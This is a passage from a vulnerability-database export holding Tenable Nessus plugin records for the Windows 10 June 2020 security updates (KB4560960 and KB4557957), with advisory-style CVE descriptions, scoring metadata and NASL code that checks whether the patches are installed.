or\n delete data; or create new accounts with full user\n rights. The security update addresses the vulnerability\n by correcting the input sanitization error to preclude\n unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could read memory that was freed and might run arbitrary\n code in an elevated context. An attacker could exploit\n this vulnerability by running a specially crafted\n application on the victim system. The update addresses\n the vulnerability by correcting the way the Windows\n Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1315)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when a\n Windows service improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when\n Microsoft Windows fails to properly handle cabinet\n files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability\n exists in Windows Security Health Service when handling\n certain objects in memory. (CVE-2020-1162,\n CVE-2020-1324)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-1213, CVE-2020-1214,\n CVE-2020-1215, CVE-2020-1216, CVE-2020-1230,\n CVE-2020-1260)\n\n - An elevation of privilege vulnerability exists when the\n Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way\n that Microsoft browsers access objects in memory. The\n vulnerability could corrupt memory in a way that could\n allow an attacker to execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows\n Registry improperly handles filesystem operations. An\n attacker who successfully exploited the vulnerability\n could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - An elevation of privilege vulnerability exists when the\n Windows Runtime improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in an elevated context. An\n attacker could exploit this vulnerability by running a\n specially crafted application on the victim system. The\n update addresses the vulnerability by correcting the way\n the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235,\n CVE-2020-1265, CVE-2020-1282, CVE-2020-1304,\n CVE-2020-1306, CVE-2020-1334)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-1160)\n\n - A remote code execution vulnerability exists in the way\n that the ChakraCore scripting engine handles objects in\n memory. The vulnerability could corrupt memory in such a\n way that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-1073)\n\n - An elevation of privilege vulnerability exists when the\n Windows State Repository Service improperly handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n an elevated context. An attacker could exploit this\n vulnerability by running a specially crafted application\n on the victim system. The update addresses the\n vulnerability by correcting the way the Windows State\n Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when\n Windows Host Guardian Service improperly handles hashes\n recorded and logged. An attacker who successfully\n exploited the vulnerability could tamper with the log\n file. In an attack scenario, an attacker can change\n existing event log types to a type the parsers do not\n interpret allowing an attacker to append their own hash\n without triggering an alert. The update addresses the\n vulnerability by correcting how Windows Host Guardian\n Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists when the\n Windows Backup Service improperly handles file\n operations. (CVE-2020-1271)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-1277,\n CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this\n vulnerability could determine the origin of all webpages\n in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an\n OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when\n Group Policy improperly checks access. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when\n Windows Lockscreen fails to properly load spotlight\n images from a secure location. An attacker who\n successfully exploited the vulnerability could execute\n commands with elevated permissions. An authenticated\n attacker could modify a registry value to exploit this\n vulnerability. The security update addresses the\n vulnerability by ensuring that the spotlight images are\n always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in\n OpenSSH for Windows when it does not properly restrict\n access to configuration settings. An attacker who\n successfully exploited this vulnerability could replace\n the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the\n way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when\n Windows Modules Installer Service improperly handles\n class object members. A locally authenticated attacker\n could run arbitrary code with elevated system\n privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. The update addresses the\n vulnerability by correcting how Windows handles calls to\n preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when\n Component Object Model (COM) client uses special case\n IIDs. An attacker who successfully exploited this\n vulnerability could run arbitrary code with elevated\n system privileges. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251,\n CVE-2020-1253, CVE-2020-1310)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-1258)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles objects in\n memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge\n (Chromium-based) in IE Mode improperly handles specific\n redirects. An attacker who successfully exploits the IE\n Mode vulnerability could trick a user into believing\n that the user was on a legitimate website. The specially\n crafted website could either spoof content or serve as a\n pivot to chain an attack with other vulnerabilities in\n web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the\n Windows Shell does not properly validate file paths. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in the context of the current\n user. If the current user is logged on as an\n administrator, an attacker could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with elevated privileges. Users whose accounts\n are configured to have fewer privileges on the system\n could be less impacted than users who operate with\n administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in\n Windows Text Service Framework (TSF) when the TSF server\n fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this\n vulnerability could run arbitrary code in a privileged\n process. An attacker could then install programs; view,\n change, or delete data; or create new accounts with full\n user rights. (CVE-2020-1314)\n\n - A denial of service vulnerability exists when Connected\n User Experiences and Telemetry Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could cause a system to\n stop responding. (CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when the\n Windows Spatial Data Service improperly handles objects\n in memory. An attacker could exploit the vulnerability\n to overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-1441)\");\n # https://support.microsoft.com/en-us/help/4560960/windows-10-update-kb4560960\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?98e819b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4560960.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1307\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-1317\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows Update Orchestrator unchecked ScheduleWork call');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/06/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\ninclude('install_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS20-06';\nkbs = make_list(\n '4560960'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18362',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4560960]) ||\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'06_2020',\n bulletin:bulletin,\n rollup_kb_list:[4560960])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:01:46", "description": "The remote Windows host is missing security update 4557957.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the way that the wlansvc.dll handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1270)\n\n - An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0986, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-1348)\n\n - A vulnerability exists in the way the Windows Diagnostics & feedback settings app handles objects in memory. An attacker who successfully exploited this vulnerability could cause additional diagnostic data from the affected device to be sent to Microsoft.\n (CVE-2020-1296)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1213, CVE-2020-1214, CVE-2020-1215, CVE-2020-1216, CVE-2020-1230)\n\n - An information disclosure vulnerability exists when the win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1290)\n\n - A remote code execution vulnerability exists when Microsoft Windows OLE fails to properly validate user input. An attacker could exploit the vulnerability to execute malicious code. (CVE-2020-1281)\n\n - An information disclosure vulnerability exists in the way Windows Error Reporting (WER) handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1261, CVE-2020-1263)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) IIS module improperly handles uploaded content. An attacker who successfully exploited this vulnerability could upload restricted file types to an IIS-hosted folder. (CVE-2020-1255)\n\n - A denial of service vulnerability exists when Connected User Experiences and Telemetry Service improperly handles file operations. An attacker who successfully exploited this vulnerability could cause a system to stop responding. (CVE-2020-1120, CVE-2020-1244)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash. An attacker who successfully exploited this vulnerability could delete a targeted file leading to an elevated status. (CVE-2020-1197)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1291)\n\n - A memory corruption vulnerability exists when Windows Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could install programs; view, change, or delete data; or create new accounts with full user rights. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit a malicious webpage. The security update addresses the vulnerability by correcting how Windows Media Foundation handles objects in memory. (CVE-2020-1238, CVE-2020-1239)\n\n - An elevation of privilege vulnerability exists when the Windows Feedback Hub improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1199)\n\n - An information disclosure vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1206)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector or the Visual Studio Standard Collector fail to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1202, CVE-2020-1203)\n\n - An elevation of privilege vulnerability exists when Windows Mobile Device Management (MDM) Diagnostics improperly handles junctions. An attacker who successfully exploited this vulnerability could bypass access restrictions to delete files. (CVE-2020-1204)\n\n - An elevation of privilege vulnerability exists in the way the Windows Now Playing Session Manager handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could then install programs; view, change or delete data. (CVE-2020-1201)\n\n - An elevation of privilege vulnerability exists when the Windows Backup Service improperly handles file operations. (CVE-2020-1271)\n\n - A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory. An attacker who successfully exploited this vulnerability could execute arbitrary code on a victim system. An attacker could exploit this vulnerability by enticing a victim to open a specially crafted file. The update addresses the vulnerability by correcting the way the Windows Jet Database Engine handles objects in memory. (CVE-2020-1208, CVE-2020-1236)\n\n - An elevation of privilege vulnerability exists in the way that the Connected Devices Platform Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1211)\n\n - A security feature bypass vulnerability exists when Windows Kernel fails to properly sanitize certain parameters. (CVE-2020-1241)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-1257, CVE-2020-1278, CVE-2020-1293)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Bluetooth Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1280)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1248)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. (CVE-2020-1272)\n\n - An information disclosure vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could read memory that was freed and might run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory. (CVE-2020-1217)\n\n - An information disclosure vulnerability exists when Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1315)\n\n - An elevation of privilege vulnerability exists in the way that the Windows WalletService handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1287, CVE-2020-1294)\n\n - An information disclosure vulnerability exists when a Windows service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1268)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-1313)\n\n - A remote code execution vulnerability exists when Microsoft Windows fails to properly handle cabinet files. (CVE-2020-1300)\n\n - An elevation of privilege (user to user) vulnerability exists in Windows Security Health Service when handling certain objects in memory. (CVE-2020-1162, CVE-2020-1324)\n\n - An elevation of privilege vulnerability exists when the Windows Runtime improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Runtime handles objects in memory.\n (CVE-2020-1231, CVE-2020-1233, CVE-2020-1235, CVE-2020-1282, CVE-2020-1304, CVE-2020-1306, CVE-2020-1334)\n\n - An elevation of privilege vulnerability exists when the Microsoft Store Runtime improperly handles memory.\n (CVE-2020-1222, CVE-2020-1309)\n\n - A remote code execution vulnerability exists in the way that Microsoft browsers access objects in memory. The vulnerability could corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-1219)\n\n - A denial of service vulnerability exists when Windows Registry improperly handles filesystem operations. An attacker who successfully exploited the vulnerability could cause a denial of service against a system.\n (CVE-2020-1194)\n\n - A remote code execution vulnerability exists in Microsoft Windows that could allow remote code execution if a .LNK file is processed. An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. (CVE-2020-1299)\n\n - An information disclosure vulnerability exists when the Microsoft Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. (CVE-2020-1160)\n\n - An elevation of privilege vulnerability exists when the Windows State Repository Service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows State Repository Service handles objects in memory.\n (CVE-2020-1305)\n\n - A security feature bypass vulnerability exists when Windows Host Guardian Service improperly handles hashes recorded and logged. An attacker who successfully exploited the vulnerability could tamper with the log file. In an attack scenario, an attacker can change existing event log types to a type the parsers do not interpret allowing an attacker to append their own hash without triggering an alert. The update addresses the vulnerability by correcting how Windows Host Guardian Service handles logging of the measured boot hash.\n (CVE-2020-1259)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-1209)\n\n - A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n (CVE-2020-1301)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-1277, CVE-2020-1302, CVE-2020-1312)\n\n - An information disclosure vulnerability exists in the way that Microsoft Edge handles cross-origin requests.\n An attacker who successfully exploited this vulnerability could determine the origin of all webpages in the affected browser. (CVE-2020-1242)\n\n - An elevation of privilege vulnerability exists when an OLE Automation component improperly handles memory.\n (CVE-2020-1212)\n\n - An elevation of privilege vulnerability exists when Group Policy improperly checks access. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-1317)\n\n - An elevation of privilege vulnerability exists when Windows Lockscreen fails to properly load spotlight images from a secure location. An attacker who successfully exploited the vulnerability could execute commands with elevated permissions. An authenticated attacker could modify a registry value to exploit this vulnerability. The security update addresses the vulnerability by ensuring that the spotlight images are always loaded from a secure location. (CVE-2020-1279)\n\n - An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings. An attacker who successfully exploited this vulnerability could replace the shell with a malicious binary. (CVE-2020-1292)\n\n - An elevation of privilege vulnerability exists in the way that the printconfig.dll handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1196)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0915, CVE-2020-0916)\n\n - An elevation of privilege vulnerability exists when Windows Modules Installer Service improperly handles class object members. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. The update addresses the vulnerability by correcting how Windows handles calls to preclude unintended elevation. (CVE-2020-1254)\n\n - An elevation of privilege vulnerability exists when Component Object Model (COM) client uses special case IIDs. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1311)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n (CVE-2020-1237)\n\n - A denial of service vulnerability exists in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An authenticated attacker who successfully exploited this vulnerability against an SMB Server could cause the affected system to crash. An unauthenticated attacker could also exploit this this vulnerability against an SMB client and cause the affected system to crash. (CVE-2020-1284)\n\n - A denial of service vulnerability exists when Windows improperly handles objects in memory. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-1283)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles objects in memory. (CVE-2020-1234)\n\n - A spoofing vulnerability exists when theMicrosoft Edge (Chromium-based) in IE Mode improperly handles specific redirects. An attacker who successfully exploits the IE Mode vulnerability could trick a user into believing that the user was on a legitimate website. The specially crafted website could either spoof content or serve as a pivot to chain an attack with other vulnerabilities in web services. (CVE-2020-1220)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. (CVE-2020-1232)\n\n - A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths. An attacker who successfully exploited this vulnerability could run arbitrary code in the context of the current user. If the current user is logged on as an administrator, an attacker could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with elevated privileges. Users whose accounts are configured to have fewer privileges on the system could be less impacted than users who operate with administrative privileges. (CVE-2020-1286)\n\n - An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1207, CVE-2020-1247, CVE-2020-1251, CVE-2020-1253)\n\n - An elevation of privilege vulnerability exists in Windows Text Service Framework (TSF) when the TSF server fails to properly handle messages sent from TSF clients.\n An attacker who successfully exploited this vulnerability could run arbitrary code in a privileged process. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-1314)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-1258)", "cvss3": {}, "published": "2020-06-10T00:00:00", "type": "nessus", "title": "KB4557957: Windows 10 Version 2004 June 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0915", "CVE-2020-0916", "CVE-2020-0986", "CVE-2020-1120", "CVE-2020-1160", "CVE-2020-1162", "CVE-2020-1194", "CVE-2020-1196", "CVE-2020-1197", "CVE-2020-1199", "CVE-2020-1201", "CVE-2020-1202", "CVE-2020-1203", "CVE-2020-1204", "CVE-2020-1206", "CVE-2020-1207", "CVE-2020-1208", "CVE-2020-1209", "CVE-2020-1211", "CVE-2020-1212", "CVE-2020-1213", "CVE-2020-1214", "CVE-2020-1215", "CVE-2020-1216", "CVE-2020-1217", "CVE-2020-1219", "CVE-2020-1220", "CVE-2020-1222", "CVE-2020-1230", "CVE-2020-1231", "CVE-2020-1232", "CVE-2020-1233", "CVE-2020-1234", "CVE-2020-1235", "CVE-2020-1236", "CVE-2020-1237", "CVE-2020-1238", "CVE-2020-1239", "CVE-2020-1241", "CVE-2020-1242", "CVE-2020-1244", "CVE-2020-1246", "CVE-2020-1247", "CVE-2020-1248", "CVE-2020-1251", "CVE-2020-1253", "CVE-2020-1254", "CVE-2020-1255", "CVE-2020-1257", "CVE-2020-1258", "CVE-2020-1259", "CVE-2020-1261", "CVE-2020-1262", "CVE-2020-1263", "CVE-2020-1264", "CVE-2020-1266", "CVE-2020-1268", "CVE-2020-1269", "CVE-2020-1270", "CVE-2020-1271", "CVE-2020-1272", "CVE-2020-1273", "CVE-2020-1274", "CVE-2020-1275", "CVE-2020-1276", "CVE-2020-1277", "CVE-2020-1278", "CVE-2020-1279", "CVE-2020-1280", "CVE-2020-1281", "CVE-2020-1282", "CVE-2020-1283", "CVE-2020-1284", "CVE-2020-1286", "CVE-2020-1287", "CVE-2020-1290", "CVE-2020-1291", "CVE-2020-1292", "CVE-2020-1293", "CVE-2020-1294", "CVE-2020-1296", "CVE-2020-1299", "CVE-2020-1300", "CVE-2020-1301", "CVE-2020-1302", "CVE-2020-1304", "CVE-2020-1305", "CVE-2020-1306", "CVE-2020-1307", "CVE-2020-1309", "CVE-2020-1311", "CVE-2020-1312", "CVE-2020-1313", "CVE-2020-1314", "CVE-2020-1315", "CVE-2020-1316", "CVE-2020-1317", "CVE-2020-1324", "CVE-2020-1334", "CVE-2020-1348"], "modified": "2023-03-06T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_JUN_4557957.NASL", "href": "https://www.tenable.com/plugins/nessus/137304", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n 